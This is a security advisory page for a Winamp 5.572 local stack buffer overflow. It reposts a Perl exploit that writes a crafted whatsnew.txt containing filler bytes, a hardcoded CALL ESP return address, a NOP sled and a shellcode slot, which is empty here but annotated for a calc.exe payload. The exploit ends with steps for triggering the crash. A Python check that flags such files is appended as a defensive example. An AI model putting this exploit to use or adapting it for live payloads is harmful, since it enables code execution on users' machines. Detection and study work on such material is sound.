SecurityReason.com - Our Reason is Security

Topic : Winamp 5.572 local buffer overflow

WLB : WLB-2010010108
SecurityAlert : None
Date : 2010-01-27
Credit : NeoCortex
SecurityRisk : High
Remote : No
Local : Yes
Status : Bug

History : [2010-01-27] Started

Affected software : Winamp version 5.572

Text :

# Exploit Title: Winamp 5.572 local buffer overflow
# Date: 25-01-2010
# Author: NeoCortex - PoC by Debug
# http://www.exploit-db.com/exploits/11248
# Software Link: http://www.exploit-db.com/application/11248
# Version: 5.572
# Tested on: WinXP SP3 De

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";

print " __ __________________\n";
print " ________ / \\ / / ____ / ____ / ________\n";
print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n";
print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/ \\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";



my $version = "Winamp 5.572";

my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll
my $nop = "\x90" x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"";

open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;

print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";
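
A defender-side check for the file this script writes, added here as an example and not part of the original advisory: it flags a whatsnew.txt containing an over-long line or a long run of 0x90 bytes, which is the layout the script above appends. The function name, the thresholds and the sample bytes are assumptions constructed for illustration.

```python
import re
import sys

MAX_LINE = 256                       # assumed ceiling for a changelog line
NOP_RUN = re.compile(rb"\x90{16,}")  # 16 or more consecutive 0x90 bytes
TEXT_CTRL = {0x09, 0x0A, 0x0D}       # tab, LF, CR are normal in a text file


def inspect_whatsnew(data: bytes) -> list:
    """Return human-readable findings for the raw bytes of a whatsnew.txt."""
    findings = []
    # The script appends to the file, so check every line, not only the first.
    for number, line in enumerate(data.split(b"\n"), start=1):
        length = len(line.rstrip(b"\r"))
        if length > MAX_LINE:
            findings.append(f"line {number}: {length} bytes, limit {MAX_LINE}")
    if NOP_RUN.search(data):
        findings.append("run of 0x90 bytes")
    control = sum(1 for b in data if b < 0x20 and b not in TEXT_CTRL)
    if control:
        findings.append(f"{control} control bytes")
    return findings


# Constructed samples: a short benign changelog, and the same file with a line
# appended in the layout the script uses (version string, 540 filler bytes,
# a 4-byte placeholder where the return address sits, 100 bytes of 0x90).
BENIGN = b"Winamp 5.57\r\n* Improved: sample entry\r\n* Fixed: sample entry\r\n"
SUSPICIOUS = BENIGN + b"Winamp 5.572" + b"A" * 540 + b"BBBB" + b"\x90" * 100

if __name__ == "__main__":
    # Optional argument: path to a whatsnew.txt to inspect.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SUSPICIOUS
    for finding in inspect_whatsnew(blob):
        print("[!]", finding)
```
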



References : None
